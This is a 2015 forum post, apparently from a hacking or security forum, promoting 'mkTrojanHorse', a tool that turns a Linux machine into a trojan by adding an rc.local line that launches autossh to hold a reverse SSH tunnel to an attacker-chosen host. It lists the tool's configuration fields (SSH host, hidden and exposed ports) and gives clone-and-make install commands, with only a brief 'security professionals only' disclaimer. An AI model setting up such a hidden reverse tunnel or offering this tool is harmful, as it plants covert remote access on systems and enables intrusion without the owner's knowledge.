rukov Posted December 7, 2015 Report Posted December 7, 2015 NOTICE: This post just For Security Proffesional and Computer Security Research Only! Use at your own RISK!This will make a linux machine into a Trojan Horse, and by that I mean we’ll add a line to rc.local that starts autossh to create a reverse tunnel.with menu Function:+ NAME: Enter the name you wish to associate with this container.+ TAG: Enter the tag you wish to associate with this container.+ SSH_PORT_EXPOSED: This is the port on the ssh host that is exposed. Enter the SSH_PORT_EXPOSED you wish to associate with this container.+ SSH_PORT_HIDDEN: This is the hidden port on the ssh host you will connect to reverse tunnel back to our trojan. Enter the SSH_PORT_HIDDEN you wish to associate with this container.+ SSH_PORT_MONITOR: This is the monitor port. Enter the SSH_PORT_MONITOR you wish to associate with this container.+ SSH_HOST: This is the host the trojan will call out to and make the reverse tunnel at. Enter the SSH_HOST you wish to associate with this container.Installation:git clone https://github.com/joshuacox/mkTrojanHorsecd <your clone folder>makeDownload https://github.com/joshuacox/mkTrojanHorse Quote